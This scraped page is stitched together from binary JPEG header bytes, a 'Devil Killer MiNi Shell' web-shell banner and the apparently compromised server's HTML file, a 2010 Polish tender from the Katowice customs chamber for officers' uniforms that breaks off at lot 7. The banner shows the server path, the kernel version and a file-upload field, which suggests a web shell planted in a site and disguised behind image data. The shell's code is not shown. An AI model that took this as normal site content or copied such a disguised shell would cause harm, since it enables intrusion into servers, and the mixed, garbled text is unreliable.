JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100421/113012-N-2010.html

<p class="kh_header"><b>Katowice: zakup wraz z dostawą składników umundurowania oraz szycie umundurowania dla funkcjonariuszy celnych</b><br>
<b>Numer ogłoszenia: 113012 - 2010; data zamieszczenia: 21.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Katowicach , Plac Grunwaldzki 8-10, 40-127 Katowice, woj. śląskie, tel. 032 3587161, faks 032 3587204.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup wraz z dostawą składników umundurowania oraz szycie umundurowania dla funkcjonariuszy celnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zakup wraz z dostawą składników umundurowania oraz szycie umundurowania dla funkcjonariuszy celnych zgodnie z Rozporządzeniem Ministra Finansów z dnia 23 listopada 2009 roku w sprawie umundurowania funkcjonariuszy celnych (Dz. U. Nr 197 z dnia 25.11.2009r. poz. 1521)  

Zadanie 1 - Uszycie umundurowania w ilościach jn., zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Marynarka damska	szt.	85
Marynarka męska	szt.	88
Kamizelka 	szt.	85
Spódnica	szt.	90
Spodnie męskie	par	184
Spodnie damskie	par	85
Emblemat	szt.	173

Wykonawca zobowiązany jest do pobrania miar oraz wykonania przymiarek, w komórkach organizacyjnych Zamawiającego, tj. w: 
- Izbie Celnej w Katowicach
- Urzędzie Celnym w Katowicach;
- Oddziale Celnym w Tychach;
- Oddziale Celnym w Sławkowie ;
- Oddziale Celnym Port Lotniczy w Katowicach - Pyrzowicach;
- Granicznym Referacie Zwalczania Przestępczości w Katowicach - Pyrzowicach;
- Urzędzie Celnym w Częstochowie;
- Oddziale Celnym w Częstochowie;
- Urzędzie Celnym w Bielsku Białej;
- Oddziale Celnym w Czechowicach Dziedzicach;
- Miejsce Wyznaczone SADI w Bielsku-Białej;
- Oddziale Celnym w Żywcu;
- Wydziale Intrastat w Cieszynie   
- Urzędzie Celnym  w Rybniku;
- Oddziale Celnym w Gliwicach;
- Oddziale Celnym w Bytomiu,
- Oddziale Celnym w Raciborzu;
- Miejsce Wyznaczone Poczta Polska w Zabrzu



Zadanie 2 - Zakup wraz z dostawą kurtek.

Kurtki należy dostarczyć w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 

Nazwa składnika	Jednostka miary	Ilość
Kurtka (z naszytym emblematem)	szt.	157



Zadanie 3 - Zakup wraz z dostawą koszul.
Koszule należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Koszula miętowa z długim rękawem  z mocowanym na rzep emblematem	szt.	352
Koszula miętowa z krótkim rękawem  z mocowanym na rzep emblematem	szt.	426
Koszula biała z długim rękawem  z mocowanym na rzep emblematem	szt.	166
Koszula biała z krótkim rękawem  z mocowanym na rzep emblematem	szt.	164


Zadanie 4 - Zakup wraz z dostawą czapek służbowych
Czapki należy dostarczyć w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ
Nazwa składnika	Jednostka miary	Ilość
Czapka służbowa (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	61
Czapka służbowa z 1 galonem (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	20


Zadanie 5 - Zakup wraz z dostawą kapelusików
Kapelusiki należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Kapelusik (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	64
Kapelusik z 1 galonem (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	12

Zadanie 6 - Zakup wraz z dostawą swetrów typu polar oraz szali polarowych 
Swetry oraz szale należy dostarczyć w ilościach podanych poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Sweter typu polar z naszytym emblematem	  szt.	158
Szal polarowy	szt. 	157

Zadanie 7- Zakup wraz z dostawą półbutów
Półbuty należy dostarczyć  w ilości podanej poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Półbuty	par	81

Zadanie 8 -  Zakup wraz z dostawą rękawiczek skórzanych
Rękawiczki należy dostarczyć w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Rękawiczki zimowe	par	160

Zadanie 9 -  Zakup wraz z dostawą krawatów i krawatek 
Krawaty i krawatki należy dostarczyć w ilościach podanych poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Krawat	szt.	100
Krawatka	szt.	85

Zadanie 10 - Zakup wraz z dostawą pasków do spodni
Paski należy dostarczyć  w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku N 6 do SIWZ 
Nazwa składnika	Jednostka miary	Ilość
Pasek do spodni	szt.	114



Zadanie 11- Zakup wraz z dostawą dystynkcji i sznurów galowych
Dystynkcje i sznury galowe należy dostarczyć w ilościach podanych poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Dystynkcje - nasuwki	par	655
Sznur galowy	szt.	157

Zadanie 12 - Zakup wraz z dostawą składników ubioru specjalnego
Poszczególne składniki ubioru specjalnego należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 7 do SIWZ.  

Nazwa składnika	Jednostka miary	Ilość
Koszulka typu polo koloru czarnego	szt.	210
Koszulobluza z długim rękawem, koloru czarnego+ naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	szt.	105
Koszulobluza z krótkim rękawem, koloru czarnego+ naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	szt.	105
Spodnie polowe letnie 	par	105
Spodnie polowe zimowe	par	105
Podkoszulek z krótkim rękawem	szt.	210
Czapka polowa letnia koloru czarnego	szt.	105
Emblemat przewodnik psa służbowego	szt.	14
Komplet całoroczny + naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	kpl.	1
Czapka polowa zimowa koloru czarnego	szt.	1
Kombinezon jednoczęściowy koloru czarnego + naszyty emblemat Służba Celna oraz emblemat komórek zwalczania przestępczości	szt.	1
Czapka typu dokerka koloru czarnego	szt.	1
Rękawiczki ochronne z powłoką antypoślizgową	par	6

Zadanie 13 - Zakup wraz z dostawą butów na grubej podeszwie.
Buty, będące składnikiem ubioru specjalnego, należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 7. 

Nazwa składnika	Jednostka miary	Ilość 
Buty letnie na grubej podeszwie	para	105
Buty wysokie na grubej podeszwie	para	105.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.11.00.00-3, 18.22.32.00-0, 18.23.20.00-4, 18.23.40.00-8, 18.23.53.00-8, 18.33.00.00-1, 18.42.20.00-3, 18.42.30.00-0, 18.42.40.00-7, 18.42.50.00-4, 18.44.10.00-2, 18.44.33.20-5, 18.81.50.00-5, 18.81.51.00-6, 39.56.11.30-2, 98.39.30.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie pobiera się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie co najmniej dwóch usług / dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, odpowiadających swoim rodzajem i wartością usługom  / dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców o wartości przekraczającej  odpowiednio do:
Zadania 1		-	  60 000,00 zł brutto; 
Zadania 2		-	  30 000,00 zł brutto; 
Zadania 3		-	  25 000,00 zł brutto; 
Zadania 12	-	  40 000,00 zł brutto; 
Zadania 13	-	  35 000,00 zł brutto; 

Zamawiający dokona oceny spełniania warunków na podstawie załączonych dokumentów i oświadczeń,  o których mowa w Rozdziale VI SIWZ.
Ocena spełniania warunków dokonywana będzie w systemie 0 - 1 (zero - jedynkowym, tj. spełnia - nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.ic.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: 40-127 Katowice, Pl. Grunwaldzki 8-10, pok. 250, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2010 godzina 10:00, miejsce: Siedziba Zamawiającego: 40-127 Katowice, Pl. Grunwaldzki 8-10, KANCELARIA -pok. 222, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Uszycie umundurowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - Uszycie umundurowania w ilościach jn., zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Marynarka damska	szt.	85
Marynarka męska	szt.	88
Kamizelka 	szt.	85
Spódnica	szt.	90
Spodnie męskie	par	184
Spodnie damskie	par	85
Emblemat	szt.	173

Wykonawca zobowiązany jest do pobrania miar oraz wykonania przymiarek, w komórkach organizacyjnych Zamawiającego, tj. w: 
- Izbie Celnej w Katowicach
- Urzędzie Celnym w Katowicach;
- Oddziale Celnym w Tychach;
- Oddziale Celnym w Sławkowie ;
- Oddziale Celnym Port Lotniczy w Katowicach - Pyrzowicach;
- Granicznym Referacie Zwalczania Przestępczości w Katowicach - Pyrzowicach;
- Urzędzie Celnym w Częstochowie;
- Oddziale Celnym w Częstochowie;
- Urzędzie Celnym w Bielsku Białej;
- Oddziale Celnym w Czechowicach Dziedzicach;
- Miejsce Wyznaczone SADI w Bielsku-Białej;
- Oddziale Celnym w Żywcu;
- Wydziale Intrastat w Cieszynie   
- Urzędzie Celnym  w Rybniku;
- Oddziale Celnym w Gliwicach;
- Oddziale Celnym w Bytomiu,
- Oddziale Celnym w Raciborzu;
- Miejsce Wyznaczone Poczta Polska w Zabrzu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.30.00-4, 18.23.20.00-4, 18.23.40.00-8, 39.56.11.30-2, 18.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup wraz z dostawą kurtek..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - Zakup wraz z dostawą kurtek.

Kurtki należy dostarczyć w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 

Nazwa składnika	Jednostka miary	Ilość
Kurtka (z naszytym emblematem)	szt.	157.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-0, 18.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wraz z dostawą koszul..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 - Zakup wraz z dostawą koszul.
Koszule należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ. 
Nazwa składnika	Jednostka miary	Ilość
Koszula miętowa z długim rękawem  z mocowanym na rzep emblematem	szt.	352
Koszula miętowa z krótkim rękawem  z mocowanym na rzep emblematem	szt.	426
Koszula biała z długim rękawem  z mocowanym na rzep emblematem	szt.	166
Koszula biała z krótkim rękawem  z mocowanym na rzep emblematem	szt.	164.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.00.00-1, 39.56.11.30-2, 18.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup wraz z dostawą czapek służbowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4 - Zakup wraz z dostawą czapek służbowych
Czapki należy dostarczyć w ilości podanej poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ
Nazwa składnika	Jednostka miary	Ilość
Czapka służbowa (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	61
Czapka służbowa z 1 galonem (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.33.20-5, 18.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup wraz z dostawą kapelusików.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5 - Zakup wraz z dostawą kapelusików
Kapelusiki należy dostarczyć w ilościach podanych poniżej oraz zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Kapelusik (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	64
Kapelusik z 1 galonem (w cenę wliczony jest orzełek metalowy i merkuriusz)	szt.	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.44.10.00-2, 18.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup wraz z dostawą swetrów typu polar oraz szali polarowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6 - Zakup wraz z dostawą swetrów typu polar oraz szali polarowych 
Swetry oraz szale należy dostarczyć w ilościach podanych poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Sweter typu polar z naszytym emblematem	  szt.	158
Szal polarowy	szt. 	157.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.20.00-3, 18.23.53.00-8, 18.11.00.00-3, 39.56.11.30-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup wraz z dostawą półbutów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7- Zakup wraz z dostawą półbutów
Półbuty należy dostarczyć  w ilości podanej poniżej oraz  zgodnie z opisem zawartym w Załączniku Nr 6 do SIWZ  
Nazwa składnika	Jednostka miary	Ilość
Półbuty	par	81.</p></li>
